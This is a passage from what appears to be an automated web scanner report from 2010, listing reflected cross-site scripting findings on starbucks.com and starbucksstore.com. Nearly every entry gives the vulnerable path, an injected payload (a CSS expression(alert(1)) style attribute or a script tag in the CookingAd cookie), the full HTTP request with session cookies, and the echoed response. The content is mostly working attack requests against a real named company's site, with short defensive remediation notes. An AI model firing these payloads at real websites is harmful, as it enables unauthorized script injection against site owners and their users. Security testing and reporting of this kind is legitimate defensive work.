GET /menu/nutrition/35-under-350?c6282"style%3d"x%3aexpression(alert(1))"6302ba5a92f=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 19:21:40 GMT Connection: close Content-Length: 40761
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/nutrition/35-under-350?c6282"style="x:expression(alert(1))"6302ba5a92f=1"/> ...[SNIP]...
3.58. http://www.starbucks.com/responsibility [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/responsibility
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f9dd"style%3d"x%3aexpression(alert(1))"d76f2f8f40c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5f9dd"style="x:expression(alert(1))"d76f2f8f40c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.
Request
GET /responsibility?5f9dd"style%3d"x%3aexpression(alert(1))"d76f2f8f40c=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 21:09:34 GMT Connection: close Content-Length: 56936
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/responsibility?5f9dd"style="x:expression(alert(1))"d76f2f8f40c=1"/> ...[SNIP]...
3.59. http://www.starbucks.com/responsibility/community [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/responsibility/community
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81393"style%3d"x%3aexpression(alert(1))"7591aad8b9b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 81393"style="x:expression(alert(1))"7591aad8b9b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.
Request
GET /responsibility/community?81393"style%3d"x%3aexpression(alert(1))"7591aad8b9b=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 20:28:55 GMT Connection: close Content-Length: 40289
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/responsibility/community?81393"style="x:expression(alert(1))"7591aad8b9b=1"/> ...[SNIP]...
3.60. http://www.starbucks.com/responsibility/community/community-service [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/responsibility/community/community-service
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c425"style%3d"x%3aexpression(alert(1))"142c5cf33b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7c425"style="x:expression(alert(1))"142c5cf33b3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.
Request
GET /responsibility/community/community-service?7c425"style%3d"x%3aexpression(alert(1))"142c5cf33b3=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 20:27:01 GMT Connection: close Content-Length: 37371
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/responsibility/community/community-service?7c425"style="x:expression(alert(1))"142c5cf33b3=1"/> ...[SNIP]...
3.61. http://www.starbucks.com/responsibility/community/starbucks-foundation [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/responsibility/community/starbucks-foundation
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85521"style%3d"x%3aexpression(alert(1))"af4db09bc1a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 85521"style="x:expression(alert(1))"af4db09bc1a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.
Request
GET /responsibility/community/starbucks-foundation?85521"style%3d"x%3aexpression(alert(1))"af4db09bc1a=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 21:08:18 GMT Connection: close Content-Length: 39222
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/responsibility/community/starbucks-foundation?85521"style="x:expression(alert(1))"af4db09bc1a=1"/> ...[SNIP]...
3.62. http://www.starbucks.com/responsibility/community/starbucks-red [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/responsibility/community/starbucks-red
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17939"style%3d"x%3aexpression(alert(1))"3c77ff10018 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 17939"style="x:expression(alert(1))"3c77ff10018 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.
Request
GET /responsibility/community/starbucks-red?17939"style%3d"x%3aexpression(alert(1))"3c77ff10018=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 21:02:25 GMT Connection: close Content-Length: 42231
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/responsibility/community/starbucks-red?17939"style="x:expression(alert(1))"3c77ff10018=1"/> ...[SNIP]...
3.63. http://www.starbucks.com/responsibility/community/youth-action [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/responsibility/community/youth-action
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40290"style%3d"x%3aexpression(alert(1))"07bc4a8acaf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 40290"style="x:expression(alert(1))"07bc4a8acaf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.
Request
GET /responsibility/community/youth-action?40290"style%3d"x%3aexpression(alert(1))"07bc4a8acaf=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 20:29:53 GMT Connection: close Content-Length: 40428
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/responsibility/community/youth-action?40290"style="x:expression(alert(1))"07bc4a8acaf=1"/> ...[SNIP]...
The value of the 61fd7"style%3d"x%3aexpression(alert(1))"61073b145fc request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload b88b9%20style%3dx%3aexpression(alert(1))%20df8091f7da5 was submitted in the 61fd7"style%3d"x%3aexpression(alert(1))"61073b145fc parameter. This input was echoed as b88b9 style=x:expression(alert(1)) df8091f7da5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of the keywords request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97134"style%3d"x%3aexpression(alert(1))"eb377b674b2 was submitted in the keywords parameter. This input was echoed as 97134"style="x:expression(alert(1))"eb377b674b2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:24:22 GMT Content-Length: 33897
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/search?keywords='97134"style="x:expression(alert(1))"eb377b674b2"/> ...[SNIP]...
3.66. http://www.starbucks.com/search [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.starbucks.com
Path: /search
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61fd7"style%3d"x%3aexpression(alert(1))"61073b145fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 61fd7"style="x:expression(alert(1))"61073b145fc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:27:39 GMT Content-Length: 33815
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/search?keywords='&61fd7"style="x:expression(alert(1))"61073b145fc=1"/> ...[SNIP]...
3.67. http://www.starbucks.com/site-map [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.starbucks.com
Path: /site-map
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c69e5"style%3d"x%3aexpression(alert(1))"a6d88efaaa3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c69e5"style="x:expression(alert(1))"a6d88efaaa3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /site-map?c69e5"style%3d"x%3aexpression(alert(1))"a6d88efaaa3=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 21:10:05 GMT Connection: close Content-Length: 91702
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/site-map?c69e5"style="x:expression(alert(1))"a6d88efaaa3=1"/> ...[SNIP]...
3.68. http://www.starbucks.com/store-locator [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.starbucks.com
Path: /store-locator
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5221e"style%3d"x%3aexpression(alert(1))"76d35535f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5221e"style="x:expression(alert(1))"76d35535f4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /store-locator?5221e"style%3d"x%3aexpression(alert(1))"76d35535f4=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 20:07:39 GMT Connection: close Content-Length: 39833
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/store-locator?5221e"style="x:expression(alert(1))"76d35535f4=1"/> ...[SNIP]...
3.69. http://www.starbucks.com/whats-new [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.starbucks.com
Path: /whats-new
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68c58"style%3d"x%3aexpression(alert(1))"ef582612840 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 68c58"style="x:expression(alert(1))"ef582612840 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /whats-new?68c58"style%3d"x%3aexpression(alert(1))"ef582612840=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:27:19 GMT Connection: close Content-Length: 44105
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/whats-new?68c58"style="x:expression(alert(1))"ef582612840=1"/> ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94486</script><script>alert(1)</script>44201d6d60c was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB94486</script><script>alert(1)</script>44201d6d60c;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 21224 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:36:38 GMT Connection: close
<!--S1--><!--S0--> <link href="/include/sitenew.css" type="text/css" rel="StyleSheet"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name="description" content="F ...[SNIP]... ines. */ var s_pageName="HomePage" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="HomePage" var s_prop3="SBPTPAHP1SHTB94486</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>44201D6D60C" var s_prop4="" var s_prop5="" var s_prop6="/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" var s_state=""
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7108a</script><script>alert(1)</script>5486b3db851 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /GuestAssist/poweredbycooking.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB7108a</script><script>alert(1)</script>5486b3db851;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 14241 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:37:42 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... weredbycooking.asp" var s_setRef="" var s_server="10.11.5.109" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="/guestassist/poweredbycooking.asp" var s_prop3="SBPTPAHP1SHTB7108A</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>5486B3DB851" var s_prop4="" var s_prop5="" var s_prop6="/guestassist/poweredbycooking.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign= ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 902c6</script><script>alert(1)</script>c645460f9b8 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /StarbucksCard/default.asp HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB902c6</script><script>alert(1)</script>c645460f9b8;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 19859 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:45:44 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name= ...[SNIP]... rbucks Card HomePage" var s_setRef="" var s_server="10.11.5.109" var s_channel="Shopping" var s_pageType="" var s_prop1="" var s_prop2="Starbucks Card HomePage" var s_prop3="SBPTPAHP1SHTB902C6</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>C645460F9B8" var s_prop4="" var s_prop5="" var s_prop6="/starbuckscard/default.asp" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" va ...[SNIP]...
The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6eafb</script><script>alert(1)</script>892117031bf was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
